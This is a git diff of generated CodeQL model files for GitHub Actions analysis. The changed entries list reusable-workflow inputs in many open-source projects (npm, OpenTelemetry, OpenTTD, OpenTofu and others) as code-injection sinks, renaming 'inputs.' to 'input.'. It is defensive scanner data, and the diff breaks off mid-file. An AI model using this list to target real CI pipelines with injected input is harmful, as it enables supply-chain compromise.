- ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index db4f26083a0f..d2cb1da1e9fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c12a079e2e21..c551a135a142 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 3b7122a7a139..f469f5de268d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 3e80edaaaff5..7ec8dac3f7bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 99717acf0244..4ce9252ce76c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index d9a066c2b220..abb5b43c3276 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 83e68740ac09..9e9da70e88ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 45f05ea88263..8de3f4c1ca4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 1cd25da918fa..5ec8c0969346 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 2d5a077f1f48..af9582282d0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 98571dfc5d94..61bbb9d53728 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 8cbd1927fe0c..fdb440a742ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 6d3466f09274..efd05d69abe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index c7178a298efc..9be191425ffd 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 08feb2033ffb..65a14c7cfaa1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 3483cc13b9e2..2c031ea9dc62 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index 45350e121a04..b90aacee9ca1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9665157b3ad4..56823f4e1acc 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 9ef65a67c038..0f2937f9d148 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index eade5ecdae1d..a88c74f85375 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 1478244cc9ca..b7dfd8fcc9b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 8bb0915294cd..9de8130a93e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index cba6c4fbe5a5..ea4980b8cd7a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 448d48f661db..8787c7e32c9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 50eb3b1af36a..ea55d53c215f 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 780fa92d20cc..add2fe0d2e2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 275d46772a2d..400cd50b59f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 271c80c575e2..42122b5ee22a 100644 --- 